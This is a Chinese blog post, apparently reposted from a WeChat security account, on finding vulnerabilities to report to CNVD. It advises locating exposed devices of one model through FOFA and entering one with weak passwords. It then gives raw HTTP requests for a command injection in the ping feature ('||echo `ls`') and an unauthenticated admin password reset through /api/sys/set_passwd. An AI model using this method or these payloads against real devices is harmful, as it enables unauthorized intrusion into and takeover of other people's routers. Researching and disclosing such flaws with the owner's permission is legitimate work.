先从fofa上找设备资产最好一个型号的
第一步:对此设备资产测试弱口令直倒可以进入一台设备
进入之后对功能点进行测试
通常测试点为
网络工具的ping是否存在RCE
修改密码中是否存在未授权任意密码修改
升级备份中是否存在RCE
网络工具测试:
POST /bf/ping HTTP/1.1Host:Content-Length: 106Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36Content-Type: application/json;charset=UTF-8Origin: http://Referer: http://Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cda05348636f998dddeff1d3f3fe1fc8d87ed86b4b4818536Connection: close{"ping_address":"||echo `ls`","ping_package_num":5,"ping_package_size":56,"is_first_req":false}
未授权任意密码重置测试
POST /api/sys/change_passwd HTTP/1.1Host:Content-Length: 54Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36Content-Type: application/json;charset=UTF-8Origin: http://Referer: http://Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cda05348636f998dddeff1d3f3fe1fc8d87ed86b4b4818536Connection: close{"username":"admin","admin_old":"11","admin_new":"11"}
可以看到去访问的地址是change_passwd(更改密码)是否存在set_passwd(设置密码呢)
/api/sys/change_passwd
行动一下试试看
/api/sys/set_passwd
POST /api/sys/set_passwd HTTP/1.1Host:Content-Length: 41Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36Content-Type: application/json;charset=UTF-8Origin: http://Referer: http://Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"username":"admin","admin_new":"123456"}
为什么会set_passwd以下均为自己的理解大佬勿喷-
正常情况下买到一台新的家用路由器,插电开机后让用户去设置新的密码而不像企业路由器出厂默认口令有个密码,在设置新密码时用户一般使用信号连接,这时用户一般是没有获取到Cookie和输入老密码的选项,所以我判断会有一个set_passwd
经过验证确实不需要携带Cookie和老密码去访问就可重置成功
升级模块在测试中并没有测试出漏洞
在cnvd中搜索
没有可以尝试提交,不排除在审核和未公开情况
原文始发于微信公众号(知攻善防实验室):如何快速挖cnvd
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论